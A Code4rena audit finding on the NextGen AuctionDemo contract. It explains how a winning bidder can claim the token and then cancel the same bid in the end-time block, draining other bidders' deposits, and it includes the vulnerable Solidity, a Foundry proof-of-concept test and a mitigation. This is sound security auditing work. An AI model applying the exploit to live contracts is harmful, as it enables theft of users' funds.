NextGen - 8olidity's results

Advanced smart contracts for launching generative art projects on Ethereum.

General Information

Platform: Code4rena

Start Date: 30/10/2023

Pot Size: $49,250 USDC

Total HM: 14

Participants: 243

Period: 14 days

Judge: 0xsomeone

Id: 302

League: ETH

Researcher Performance

Rank: 215/243

Findings: 1

Award: $0.00

🌟 Selected for report: 0

🚀 Solo Findings: 0

Findings Information

🌟 Selected for report: smiling_heretic

Also found by: 00decree, 00xSEV, 0x180db, 0x3b, 0x656c68616a, 0xAadi, 0xAleko, 0xAsen, 0xDetermination, 0xJuda, 0xMAKEOUTHILL, 0xMango, 0xMosh, 0xSwahili, 0x_6a70, 0xarno, 0xgrbr, 0xpiken, 0xsagetony, 3th, 8olidity, ABA, AerialRaider, Al-Qa-qa, Arabadzhiev, AvantGard, CaeraDenoir, ChrisTina, DanielArmstrong, DarkTower, DeFiHackLabs, Deft_TT, Delvir0, Draiakoo, Eigenvectors, Fulum, Greed, HChang26, Haipls, Hama, Inference, Jiamin, JohnnyTime, Jorgect, Juntao, Kaysoft, Kose, Kow, Krace, MaNcHaSsS, Madalad, MrPotatoMagic, Neon2835, NoamYakov, Norah, Oxsadeeq, PENGUN, REKCAH, Ruhum, Shubham, Silvermist, Soul22, SovaSlava, SpicyMeatball, Talfao, TermoHash, The_Kakers, Toshii, TuringConsulting, Udsen, VAD37, Vagner, Zac, Zach_166, ZdravkoHr, _eperezok, ak1, aldarion, alexfilippov314, alexxander, amaechieth, aslanbek, ast3ros, audityourcontracts, ayden, bdmcbri, bird-flu, blutorque, bronze_pickaxe, btk, c0pp3rscr3w3r, c3phas, cartlex_, cccz, ciphermarco, circlelooper, crunch, cryptothemex, cu5t0mpeo, darksnow, degensec, dethera, devival, dimulski, droptpackets, epistkr, evmboi32, fibonacci, gumgumzum, immeas, innertia, inzinko, jasonxiale, joesan, ke1caM, kimchi, lanrebayode77, lsaudit, mahyar, max10afternoon, merlin, mrudenko, nuthan2x, oakcobalt, openwide, orion, phoenixV110, pontifex, r0ck3tz, rotcivegaf, rvierdiiev, seeques, shenwilly, sl1, slvDev, t0x1c, tallo, tnquanghuy0512, tpiliposian, trachev, twcctop, vangrim, volodya, xAriextz, xeros, xuwinnie, y4y, yobiz, zhaojie

Awards

0 USDC - $0.00

Labels

bug
3 (High Risk)
partial-50
upgraded by judge
duplicate-1323

External Links

Lines of code

https://github.com/code-423n4/2023-10-nextgen/blob/main/smart-contracts/AuctionDemo.sol#L104-L130

Vulnerability details

Impact

The highest bidder can call cancelBid immediately after a successful claimAuction. Because claimAuction has already transferred the token to the highest bidder and paid the highest bid to the contract owner, the subsequent cancelBid refunds that same bid to the winner, who ends up holding both the token and their ETH. The refund is paid out of AuctionDemo's balance, i.e. out of the deposits of other bidders still held by the contract.

Proof of Concept

claimAuction gates on block.timestamp >= minter.getAuctionEndTime(_tokenid), while cancelBid gates on block.timestamp <= minter.getAuctionEndTime(_tokenid). Both checks are satisfied when block.timestamp equals the auction end time, so there is a block in which the auction can be claimed and a bid on it cancelled. claimAuction sets auctionClaim[_tokenid] but never flips the status of the winning bid, and cancelBid checks neither auctionClaim nor whether the bid being cancelled is the winning one. The highest bidder, who passes WinnerOrAdminRequired, therefore calls claimAuction and then cancelBid(_tokenid, index) on their own bid in the same block and is refunded the winning amount.

function claimAuction(uint256 _tokenid) public WinnerOrAdminRequired(_tokenid,this.claimAuction.selector){
    // `>=`: claimable from the end time onwards, including the end-time block itself
    require(block.timestamp >= minter.getAuctionEndTime(_tokenid) && auctionClaim[_tokenid] == false && minter.getAuctionStatus(_tokenid) == true);
    auctionClaim[_tokenid] = true;
    uint256 highestBid = returnHighestBid(_tokenid);
    address ownerOfToken = IERC721(gencore).ownerOf(_tokenid);
    address highestBidder = returnHighestBidder(_tokenid);
    for (uint256 i=0; i< auctionInfoData[_tokenid].length; i ++) {
        if (auctionInfoData[_tokenid][i].bidder == highestBidder && auctionInfoData[_tokenid][i].bid == highestBid && auctionInfoData[_tokenid][i].status == true) {
            // winner receives the token and the owner receives the bid; the bid's
            // status is left as true, so cancelBid still accepts it
            IERC721(gencore).safeTransferFrom(ownerOfToken, highestBidder, _tokenid);
            (bool success, ) = payable(owner()).call{value: highestBid}("");
            emit ClaimAuction(owner(), _tokenid, success, highestBid);
        } else if (auctionInfoData[_tokenid][i].status == true) {
            (bool success, ) = payable(auctionInfoData[_tokenid][i].bidder).call{value: auctionInfoData[_tokenid][i].bid}("");
            emit Refund(auctionInfoData[_tokenid][i].bidder, _tokenid, success, highestBid);
        } else {}
    }
}

// cancel a single Bid

function cancelBid(uint256 _tokenid, uint256 index) public {
    // `<=`: still allowed in the end-time block, and no check of auctionClaim
    require(block.timestamp <= minter.getAuctionEndTime(_tokenid), "Auction ended");
    require(auctionInfoData[_tokenid][index].bidder == msg.sender && auctionInfoData[_tokenid][index].status == true);
    auctionInfoData[_tokenid][index].status = false;
    (bool success, ) = payable(auctionInfoData[_tokenid][index].bidder).call{value: auctionInfoData[_tokenid][index].bid}("");
    emit CancelBid(msg.sender, _tokenid, index, success, auctionInfoData[_tokenid][index].bid);
}
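The following Foundry test is an added example, not part of the original submission or of the NextGen code. It uses a reduced stand-in for AuctionDemo (MiniAuction, with hypothetical openAuction/participateToAuction helpers and an address mapping in place of the ERC721 and minter calls) that keeps only what the finding depends on: bids for several token ids share one ETH balance, claimAuction uses `>=` and cancelBid uses `<=` against the same end time, and claimAuction never marks the winning bid inactive. The `hardened` flag switches on the fix described in the mitigation (strict `<` plus an auctionClaim check). Warping to exactly the end time shows the winner keeping the token and being refunded from another bidder's deposit, and the hardened variant refusing the cancellation.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.19;

import "forge-std/Test.sol";

/// Illustrative stand-in for AuctionDemo; not the NextGen contract.
contract MiniAuction {
    struct Bid { address bidder; uint256 bid; bool status; }

    bool public immutable hardened;
    address public immutable beneficiary;
    mapping(uint256 => uint256) public endTime;
    mapping(uint256 => Bid[]) public bids;
    mapping(uint256 => bool) public auctionClaim;
    mapping(uint256 => address) public tokenOwner; // stands in for the ERC721

    constructor(bool _hardened, address _beneficiary) {
        hardened = _hardened;
        beneficiary = _beneficiary;
    }

    function openAuction(uint256 tokenid, uint256 end) external {
        endTime[tokenid] = end;
        tokenOwner[tokenid] = beneficiary;
    }

    function participateToAuction(uint256 tokenid) external payable {
        require(block.timestamp <= endTime[tokenid], "Auction ended");
        bids[tokenid].push(Bid(msg.sender, msg.value, true));
    }

    // Index of the highest active bid (caller guarantees at least one bid).
    function highestIndex(uint256 tokenid) internal view returns (uint256 best) {
        Bid[] storage b = bids[tokenid];
        uint256 bestBid;
        for (uint256 i = 0; i < b.length; i++) {
            if (b[i].status && b[i].bid > bestBid) { bestBid = b[i].bid; best = i; }
        }
    }

    // Same `>=` boundary as AuctionDemo.claimAuction. Only the winner branch is
    // kept, and, like the original, the winning bid's status stays true.
    function claimAuction(uint256 tokenid) external {
        require(block.timestamp >= endTime[tokenid] && !auctionClaim[tokenid]);
        auctionClaim[tokenid] = true;
        Bid storage win = bids[tokenid][highestIndex(tokenid)];
        require(msg.sender == win.bidder, "not winner");
        tokenOwner[tokenid] = win.bidder;
        (bool ok, ) = payable(beneficiary).call{value: win.bid}("");
        require(ok, "payout failed");
    }

    // Same `<=` boundary as AuctionDemo.cancelBid unless hardened.
    function cancelBid(uint256 tokenid, uint256 index) external {
        if (hardened) {
            require(block.timestamp < endTime[tokenid] && !auctionClaim[tokenid], "Auction ended");
        } else {
            require(block.timestamp <= endTime[tokenid], "Auction ended");
        }
        Bid storage b = bids[tokenid][index];
        require(b.bidder == msg.sender && b.status);
        b.status = false;
        (bool ok, ) = payable(msg.sender).call{value: b.bid}("");
        require(ok, "refund failed");
    }
}

contract BoundaryTest is Test {
    uint256 constant END = 1_700_000_000;
    address alice = makeAddr("alice");
    address bob = makeAddr("bob");
    address owner = makeAddr("owner");

    // Two auctions in one contract: Alice's ends at END, Bob's is still live,
    // so Bob's 1 ETH sits in the same balance Alice is refunded from.
    function setUpAndClaim(bool hardened) internal returns (MiniAuction a) {
        a = new MiniAuction(hardened, owner);
        a.openAuction(1, END);
        a.openAuction(2, END + 1 days);
        vm.deal(alice, 1 ether);
        vm.deal(bob, 1 ether);
        vm.warp(END - 1);
        vm.prank(alice); a.participateToAuction{value: 1 ether}(1);
        vm.prank(bob);   a.participateToAuction{value: 1 ether}(2);
        vm.warp(END);                    // the boundary block: `>=` and `<=` both hold
        vm.prank(alice); a.claimAuction(1);
    }

    function testWinnerRefundedFromOtherDeposit() public {
        MiniAuction a = setUpAndClaim(false);
        vm.prank(alice); a.cancelBid(1, 0);
        assertEq(a.tokenOwner(1), alice);   // Alice holds the token...
        assertEq(alice.balance, 1 ether);   // ...and has her 1 ETH back
        assertEq(owner.balance, 1 ether);   // owner was paid from the pooled balance
        assertEq(address(a).balance, 0);    // Bob's deposit is gone
    }

    function testHardenedCancelReverts() public {
        MiniAuction a = setUpAndClaim(true);
        vm.prank(alice);
        vm.expectRevert(bytes("Auction ended"));
        a.cancelBid(1, 0);
    }
}
```

Run with forge test in a project that has forge-std installed. The second test passes with either half of the fix alone (the strict comparison rejects the end-time block; the auctionClaim check rejects any cancellation after settlement), which is why the mitigation suggests both.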

Tools Used

vscode

Recommended Mitigation Steps

Make the two time windows mutually exclusive and tie cancellation to the claim state: use a strict comparison in cancelBid (block.timestamp < minter.getAuctionEndTime(_tokenid)) or in claimAuction (block.timestamp > minter.getAuctionEndTime(_tokenid)), and additionally require auctionClaim[_tokenid] == false in cancelBid so that no bid can be cancelled once the auction has been settled.

Assessed type

Other

#0 - c4-pre-sort

2023-11-15T10:37:55Z

141345 marked the issue as duplicate of #962

#1 - c4-judge

2023-12-01T16:08:01Z

alex-ppg marked the issue as not a duplicate

#2 - c4-judge

2023-12-01T16:08:10Z

alex-ppg marked the issue as duplicate of #1788

#3 - c4-judge

2023-12-08T18:23:00Z

alex-ppg marked the issue as partial-50

#4 - c4-judge

2023-12-09T00:20:29Z

alex-ppg changed the severity to 3 (High Risk)
